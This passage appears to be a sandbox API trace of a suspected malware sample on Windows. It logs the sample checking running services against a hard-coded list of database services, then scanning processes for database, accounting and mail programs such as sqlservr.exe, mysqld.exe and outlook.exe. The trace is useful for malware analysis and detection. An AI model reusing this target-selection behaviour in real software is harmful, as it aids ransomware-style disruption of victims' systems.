	[0163.357] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0163.357] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0163.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0163.357] lstrlenW (lpString="MpsSvc") returned 6
	[0163.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0163.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0163.357] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0163.358] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0163.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0163.358] lstrlenW (lpString="Netman") returned 6
	[0163.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0163.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0163.358] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0163.358] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0163.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0163.358] lstrlenW (lpString="netprofm") returned 8
	[0163.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0163.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0163.358] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0163.358] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0163.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0163.358] lstrlenW (lpString="NlaSvc") returned 6
	[0163.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0163.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0163.358] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0163.358] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0163.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0163.358] lstrlenW (lpString="nsi") returned 3
	[0163.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0163.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0163.358] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0163.358] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0163.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0163.358] lstrlenW (lpString="PcaSvc") returned 6
	[0163.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0163.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0163.358] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0163.358] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0163.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0163.358] lstrlenW (lpString="PlugPlay") returned 8
	[0163.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0163.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0163.359] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0163.359] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0163.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0163.359] lstrlenW (lpString="Power") returned 5
	[0163.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0163.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0163.359] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0163.359] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0163.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0163.359] lstrlenW (lpString="ProfSvc") returned 7
	[0163.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0163.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0163.359] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0163.359] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0163.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0163.359] lstrlenW (lpString="RpcEptMapper") returned 12
	[0163.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0163.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0163.359] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0163.359] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0163.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0163.359] lstrlenW (lpString="RpcSs") returned 5
	[0163.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0163.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0163.359] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0163.359] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0163.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0163.359] lstrlenW (lpString="SamSs") returned 5
	[0163.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0163.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0163.359] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0163.359] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0163.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0163.359] lstrlenW (lpString="Schedule") returned 8
	[0163.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0163.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0163.360] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0163.360] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0163.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0163.360] lstrlenW (lpString="SENS") returned 4
	[0163.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0163.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0163.360] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0163.360] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0163.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0163.360] lstrlenW (lpString="ShellHWDetection") returned 16
	[0163.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0163.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0163.360] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0163.360] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0163.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0163.360] lstrlenW (lpString="Spooler") returned 7
	[0163.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0163.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0163.360] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0163.360] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0163.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0163.360] lstrlenW (lpString="SysMain") returned 7
	[0163.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0163.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0163.360] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0163.360] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0163.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0163.360] lstrlenW (lpString="Themes") returned 6
	[0163.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0163.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0163.360] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0163.360] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0163.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0163.361] lstrlenW (lpString="TrkWks") returned 6
	[0163.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0163.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0163.361] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0163.361] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0163.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0163.361] lstrlenW (lpString="UxSms") returned 5
	[0163.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0163.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0163.361] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0163.361] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0163.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0163.361] lstrlenW (lpString="WdiServiceHost") returned 14
	[0163.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0163.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0163.361] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0163.361] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0163.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0163.361] lstrlenW (lpString="WdiSystemHost") returned 13
	[0163.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0163.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0163.361] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0163.361] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0163.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0163.361] lstrlenW (lpString="Winmgmt") returned 7
	[0163.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0163.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0163.361] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0163.361] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0163.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0163.361] lstrlenW (lpString="WPDBusEnum") returned 10
	[0163.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0163.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0163.362] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0163.362] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0163.362] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0163.362] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ba6360 | out: hHeap=0x7ab0000) returned 1
	[0163.362] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3e8
	[0163.363] Process32FirstW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0163.364] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0163.364] lstrlenW (lpString="System") returned 6
	[0163.364] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0163.364] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0163.364] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0163.364] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0163.364] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0163.364] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0163.364] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0163.364] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0163.365] lstrlenW (lpString="smss.exe") returned 8
	[0163.365] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0163.365] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0163.365] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0163.365] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0163.365] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0163.365] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0163.365] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0163.365] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0163.365] lstrlenW (lpString="csrss.exe") returned 9
	[0163.365] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0163.365] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0163.365] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0163.365] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0163.365] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0163.365] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0163.365] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0163.365] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0163.366] lstrlenW (lpString="wininit.exe") returned 11
	[0163.366] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0163.366] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0163.366] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0163.366] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0163.366] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0163.366] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0163.366] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0163.366] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0163.366] lstrlenW (lpString="csrss.exe") returned 9
	[0163.366] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0163.366] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0163.366] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0163.366] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0163.366] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0163.366] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0163.366] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0163.366] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0163.367] lstrlenW (lpString="winlogon.exe") returned 12
	[0163.367] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0163.367] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0163.367] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0163.367] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0163.367] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0163.367] lstrlenW (lpString="services.exe") returned 12
	[0163.367] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0163.367] lstrlenW (lpString="lsass.exe") returned 9
	[0163.367] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0163.368] lstrlenW (lpString="lsm.exe") returned 7
	[0163.368] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0163.368] lstrlenW (lpString="svchost.exe") returned 11
	[0163.368] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0163.368] lstrlenW (lpString="svchost.exe") returned 11
	[0163.368] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0163.369] lstrlenW (lpString="svchost.exe") returned 11
	[0163.369] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0163.369] lstrlenW (lpString="svchost.exe") returned 11
	[0163.369] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0163.369] lstrlenW (lpString="svchost.exe") returned 11
	[0163.369] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0163.370] lstrlenW (lpString="audiodg.exe") returned 11
	[0163.370] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0163.370] lstrlenW (lpString="svchost.exe") returned 11
	[0163.370] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0163.378] lstrlenW (lpString="svchost.exe") returned 11
	[0163.378] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0163.378] lstrlenW (lpString="spoolsv.exe") returned 11
	[0163.379] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0163.379] lstrlenW (lpString="svchost.exe") returned 11
	[0163.379] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0163.379] lstrlenW (lpString="taskhost.exe") returned 12
	[0163.379] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0163.379] lstrlenW (lpString="userinit.exe") returned 12
	[0163.379] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0163.380] lstrlenW (lpString="dwm.exe") returned 7
	[0163.380] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0163.380] lstrlenW (lpString="explorer.exe") returned 12
	[0163.380] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0163.380] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0163.380] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0163.381] lstrlenW (lpString="reader_sl.exe") returned 13
	[0163.381] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="drvinst.exe")) returned 1
	[0163.381] lstrlenW (lpString="drvinst.exe") returned 11
	[0163.381] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0163.381] lstrlenW (lpString="taskhost.exe") returned 12
	[0163.381] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 0
	[0163.382] CloseHandle (hObject=0x3e8) returned 1
	[0163.382] Sleep (dwMilliseconds=0x1f4) 
	[0164.058] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616c60
	[0164.058] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0164.058] GetLastError () returned 0xea
